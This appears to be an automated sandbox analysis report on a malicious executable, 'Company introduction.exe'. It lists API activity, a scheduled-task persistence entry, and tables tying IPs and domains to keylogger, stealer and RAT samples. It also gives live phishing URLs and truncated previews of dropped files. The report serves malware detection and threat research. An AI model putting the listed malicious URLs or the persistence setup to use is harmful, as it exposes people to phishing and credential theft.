• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
02:39:00 | API Interceptor | 2435794x Sleep call for process: Company introduction.exe modified
02:39:02 | API Interceptor | 12x Sleep call for process: powershell.exe modified
02:39:03 | API Interceptor | 1592920x Sleep call for process: FzXKnGk.exe modified
07:39:02 | Task Scheduler | Run new task: FzXKnGk path: C:\Users\user\AppData\Roaming\FzXKnGk.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.48.1 | ydJaT4b5N8.exe | malicious | FormBook
• www.vilakodsiy.sbs/vq3j/
104.21.48.1 | NWPZbNcRxL.exe | malicious | FormBook
• www.axis138ae.shop/j2vs/
104.21.48.1 | SH8ZyOWNi2.exe | malicious | CMSBrute
• twirpx.org/administrator/index.php
104.21.48.1 | SN500, SN150 Spec.exe | malicious | FormBook
• www.antipromil.site/7ykh/
149.154.167.220 | rDEKONT-1_15_2025__75kb__pdf.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | https://savory-sweet-felidae-psrnd.glitch.me/ | malicious | HTMLPhisher
149.154.167.220 | QUOTATION REQUIRED_Enatel s.r.l..exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | Confirm Bank Statement.exe | malicious | MassLogger RAT, PureLog Stealer
149.154.167.220 | q9JZUaS1Gy.doc | malicious | Unknown
149.154.167.220 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
149.154.167.220 | 12.exe | malicious | Unknown
149.154.167.220 | 12.exe | malicious | Unknown
149.154.167.220 | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
149.154.167.220 | slime crypted.exe | malicious | MassLogger RAT
193.122.6.168 | rDEKONT-1_15_2025__75kb__pdf.exe | malicious | Snake Keylogger, VIP Keylogger
• checkip.dyndns.org/
193.122.6.168 | mnXS9meqtB.exe | malicious | MassLogger RAT, PureLog Stealer
• checkip.dyndns.org/
193.122.6.168 | gGI2gVBI0f.exe | malicious | MassLogger RAT
• checkip.dyndns.org/
193.122.6.168 | ZpYFG94D4C.exe | malicious | Snake Keylogger
• checkip.dyndns.org/
193.122.6.168 | ZaRP7yvL1J.exe | malicious | MassLogger RAT
• checkip.dyndns.org/
193.122.6.168 | grrezORe7h.exe | malicious | GuLoader, MassLogger RAT
• checkip.dyndns.org/
193.122.6.168 | ty1nyFUMlo.exe | malicious | Snake Keylogger, VIP Keylogger
• checkip.dyndns.org/
193.122.6.168 | prgNb8YFEA.exe | malicious | Snake Keylogger
• checkip.dyndns.org/
193.122.6.168 | fpIGwanLZi.exe | malicious | Snake Keylogger
• checkip.dyndns.org/
193.122.6.168 | ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
• checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | rDEKONT-1_15_2025__75kb__pdf.exe | malicious | Snake Keylogger, VIP Keylogger
• 193.122.6.168
checkip.dyndns.com | RFQ_AS0101402025.22025_PDF.exe | malicious | MassLogger RAT
• 158.101.44.242
checkip.dyndns.com | QUOTATION REQUIRED_Enatel s.r.l..exe | malicious | Snake Keylogger, VIP Keylogger
• 132.226.247.73
checkip.dyndns.com | Confirm Bank Statement.exe | malicious | MassLogger RAT, PureLog Stealer
• 132.226.8.169
checkip.dyndns.com | 50201668.exe | malicious | MassLogger RAT
• 193.122.130.0
checkip.dyndns.com | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
• 132.226.247.73
checkip.dyndns.com | MB263350411AE_1.scr.exe | malicious | MassLogger RAT, PureLog Stealer
• 193.122.130.0
checkip.dyndns.com | ABG Draft.scr.exe | malicious | MassLogger RAT, PureLog Stealer
• 158.101.44.242
checkip.dyndns.com | RENH3RE2025QUOTE.exe | malicious | MassLogger RAT, PureLog Stealer
• 132.226.247.73
checkip.dyndns.com | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
• 132.226.8.169
reallyfreegeoip.org | rDEKONT-1_15_2025__75kb__pdf.exe | malicious | Snake Keylogger, VIP Keylogger
• 104.21.96.1
reallyfreegeoip.org | RFQ_AS0101402025.22025_PDF.exe | malicious | MassLogger RAT
• 104.21.96.1
reallyfreegeoip.org | QUOTATION REQUIRED_Enatel s.r.l..exe | malicious | Snake Keylogger, VIP Keylogger
• 104.21.96.1
reallyfreegeoip.org | Confirm Bank Statement.exe | malicious | MassLogger RAT, PureLog Stealer
• 104.21.64.1
reallyfreegeoip.org | 50201668.exe | malicious | MassLogger RAT
• 104.21.64.1
reallyfreegeoip.org | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
• 104.21.48.1
reallyfreegeoip.org | MB263350411AE_1.scr.exe | malicious | MassLogger RAT, PureLog Stealer
• 104.21.16.1
reallyfreegeoip.org | ABG Draft.scr.exe | malicious | MassLogger RAT, PureLog Stealer
• 104.21.64.1
reallyfreegeoip.org | RENH3RE2025QUOTE.exe | malicious | MassLogger RAT, PureLog Stealer
• 104.21.80.1
reallyfreegeoip.org | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
• 104.21.16.1
api.telegram.org | rDEKONT-1_15_2025__75kb__pdf.exe | malicious | Snake Keylogger, VIP Keylogger
• 149.154.167.220
api.telegram.org | https://savory-sweet-felidae-psrnd.glitch.me/ | malicious | HTMLPhisher
• 149.154.167.220
api.telegram.org | QUOTATION REQUIRED_Enatel s.r.l..exe | malicious | Snake Keylogger, VIP Keylogger
• 149.154.167.220
api.telegram.org | Confirm Bank Statement.exe | malicious | MassLogger RAT, PureLog Stealer
• 149.154.167.220
api.telegram.org | q9JZUaS1Gy.doc | malicious | Unknown
• 149.154.167.220
api.telegram.org | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
• 149.154.167.220
api.telegram.org | 12.exe | malicious | Unknown
• 149.154.167.220
api.telegram.org | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
• 149.154.167.220
api.telegram.org | slime crypted.exe | malicious | MassLogger RAT
• 149.154.167.220
api.telegram.org | ElixirInjector.exe | malicious | DCRat, PureLog Stealer, zgRAT
• 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ORACLE-BMC-31898US | rDEKONT-1_15_2025__75kb__pdf.exe | malicious | Snake Keylogger, VIP Keylogger
• 193.122.6.168
ORACLE-BMC-31898US | RFQ_AS0101402025.22025_PDF.exe | malicious | MassLogger RAT
• 158.101.44.242
ORACLE-BMC-31898US | m68k.elf | malicious | Unknown
• 193.122.239.186
ORACLE-BMC-31898US | 50201668.exe | malicious | MassLogger RAT
• 193.122.130.0
ORACLE-BMC-31898US | MB263350411AE_1.scr.exe | malicious | MassLogger RAT, PureLog Stealer
• 193.122.130.0
ORACLE-BMC-31898US | ABG Draft.scr.exe | malicious | MassLogger RAT, PureLog Stealer
• 158.101.44.242
ORACLE-BMC-31898US | http://ubiquitous-twilight-c9292b.netlify.app/ | malicious | Unknown
• 129.213.176.209
ORACLE-BMC-31898US | slime crypted.exe | malicious | MassLogger RAT
• 193.122.130.0
ORACLE-BMC-31898US | MB263350411AE.scr.exe | malicious | MassLogger RAT, PureLog Stealer
• 193.122.130.0
ORACLE-BMC-31898US | Remittance Advice.exe | malicious | MassLogger RAT
• 193.122.130.0
CLOUDFLARENETUS | new order.exe | malicious | AgentTesla
• 104.26.13.205
CLOUDFLARENETUS | https://qvg.soundestlink.com/ce/c/6783ea8fa36d871b210a875d/678648091eb09f6bc9efe05e/678648224da9c434ec77e1fc?signature=c3a7b24183dde70b3cc2cefa1e1d5f8ff6f1d434aea3b4c4cfdeccd85ad85929 | malicious | Unknown
• 104.18.42.178
CLOUDFLARENETUS | MDE_File_Sample_c404ec52446527b77da6860ca493ea2007ac03d5 (1).zip | malicious | Unknown
• 104.16.148.130
CLOUDFLARENETUS | https://url.rw/ddj4f | malicious | Unknown
                                                                                                                                                  • 1.1.1.1
                                                                                                                                                  Invdoc80.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.21.18.22
                                                                                                                                                  https://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.22.67.248
                                                                                                                                                  rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 104.21.96.1
                                                                                                                                                  https://androiddatahost.com/sdsd3Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.21.80.92
                                                                                                                                                  Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  EXTERNAL Your company's credit limit has changed!.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.17.25.14
                                                                                                                                                  TELEGRAMRUrDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  http://telenerh-ogjf.icu/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  http://telegroom-nzj.icu/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  https://ofmfy.icu/Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  https://teiegtrm.cc/EN/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  https://teiegtrm.cc/apps.htmlGet hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  https://teiegroj.cc/ZH/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  https://teiegroj.cc/apps.htmlGet hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.167.99
                                                                                                                                                  https://teiegrvu.cc/VN/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                  • 149.154.170.96
                                                                                                                                                  https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | rDEKONT-1_15_2025__75kb__pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.48.1
 | RFQ_AS0101402025.22025_PDF.exe | malicious | MassLogger RAT | 104.21.48.1
 | QUOTATION REQUIRED_Enatel s.r.l..exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.48.1
 | Confirm Bank Statement.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.48.1
 | 50201668.exe | malicious | MassLogger RAT | 104.21.48.1
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.48.1
 | MB263350411AE_1.scr.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.48.1
 | ABG Draft.scr.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.48.1
 | RENH3RE2025QUOTE.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.48.1
 | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.48.1
3b5074b1b5d032e5620f69f9f700ff0e | new order.exe | malicious | AgentTesla | 149.154.167.220
 | rDEKONT-1_15_2025__75kb__pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | NLWfV87ouS.dll | malicious | Wannacry | 149.154.167.220
 | 542CxvZnI5.dll | malicious | Virut, Wannacry | 149.154.167.220
 | https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unk | malicious | Unknown | 149.154.167.220
 | https://ziyahid.github.io/netflix-clone | malicious | HTMLPhisher | 149.154.167.220
 | http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html | malicious | HTMLPhisher | 149.154.167.220
 | http://emeklilereozeldir.org/ | malicious | Unknown | 149.154.167.220
 | http://industrious-tomato-ngvkcs.mystrikingly.com/ | malicious | Unknown | 149.154.167.220
 | http://telegroom-nzj.icu/ | malicious | Telegram Phisher | 149.154.167.220
No context
Process: C:\Users\user\Desktop\Company introduction.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Users\user\AppData\Roaming\FzXKnGk.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.379460230152629
Encrypted: false
SSDEEP: 48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z8vUyus:fLHyIFKL3IZ2KRH9Ouggs
MD5: 5F355422EC7EF08609CC91728781B675
SHA1: EC2F98559C8DCCD7B3D9454618E092E6993632DF
SHA-256: 5531100331171995A90752EE94B34BBE5DBDD7BCCD4B8530C1D9C77404E8CC9C
SHA-512: 90CD74FEEA54C9A8FA1EDB2B46DDCBC8640F1573064A4F2A147E1BE04AFE84F6F77ADBB98CD108A55ED21E740726911D2196B716B48C2D6EAE93BFF936BA8CBE
Malicious: false
Preview: @...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1573
                                                                                                                                                  Entropy (8bit):5.119400958992196
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaC5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTfvv
                                                                                                                                                  MD5:3A871C4D57EF4E7719A1D1A7FCD88A2C
                                                                                                                                                  SHA1:6554BD589332C5B53C450A1763DB4D59506BC304
                                                                                                                                                  SHA-256:E454E384C15743002C76A1A26BF95816529A57501FE4300C50390549FB71A07F
                                                                                                                                                  SHA-512:E83716CAA579DA5A7EDAF945A90479C2A8102DE860799934785B44D3775D71B99E25755F07F354758B149730C3C7424A9E162C63AC655B9AC6B25B25D616BE92
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1573
                                                                                                                                                  Entropy (8bit):5.119400958992196
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaC5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTfvv
                                                                                                                                                  MD5:3A871C4D57EF4E7719A1D1A7FCD88A2C
                                                                                                                                                  SHA1:6554BD589332C5B53C450A1763DB4D59506BC304
                                                                                                                                                  SHA-256:E454E384C15743002C76A1A26BF95816529A57501FE4300C50390549FB71A07F
                                                                                                                                                  SHA-512:E83716CAA579DA5A7EDAF945A90479C2A8102DE860799934785B44D3775D71B99E25755F07F354758B149730C3C7424A9E162C63AC655B9AC6B25B25D616BE92
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                                  Process:C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):854528
                                                                                                                                                  Entropy (8bit):7.674812972167672
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:XsJN+UVsa/olYFjQyPIoqtpGFjcrpTZ6q6U7jbHXM:83+UfxFsyPIoqcETHFXX
                                                                                                                                                  MD5:10F72E53A2C9F106093C233B56A3A819
                                                                                                                                                  SHA1:E8A63836FF90493559B69A1BC6D6080BA9370A99
                                                                                                                                                  SHA-256:84E892D4627A3A3AA053B30200788BD6942C046D2DADCF5121017A32E10142F2
                                                                                                                                                  SHA-512:CD83C1B9C6128B852F36F97A387C4C89B781F0B0B52702540B12C5878129A0352C3EDC2C12E2FB13E8F159256272338833715C3D78D98C4A195B8E50BD1EBCE2
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                  • Antivirus: Virustotal, Detection: 29%, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.............2.... ... ....@.. .......................`............@.....................................O.... ..l....................@....................................................... ............... ..H............text...H.... ...................... ..`.rsrc...l.... ......................@..@.reloc.......@......................@..B........................H........a...N..............@`...........................................0..P............(....(..........s ...%s....o!....%s....o!....%s....o!....%s....o!.........*.0..\........~....r...po"....s#.....~....o$....+..o%.......o.......o....-....,..o......~....r;..po"....*......#..@......".(&....*....0..E........('.....((....s=...().....(*...rw..po+....s....(...........o,.......*............8.......0...........~....r...p.o-...o.....r...p.o-...r...p(/...s'......o)......o.....8.....
                                                                                                                                                  Process:C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):26
                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
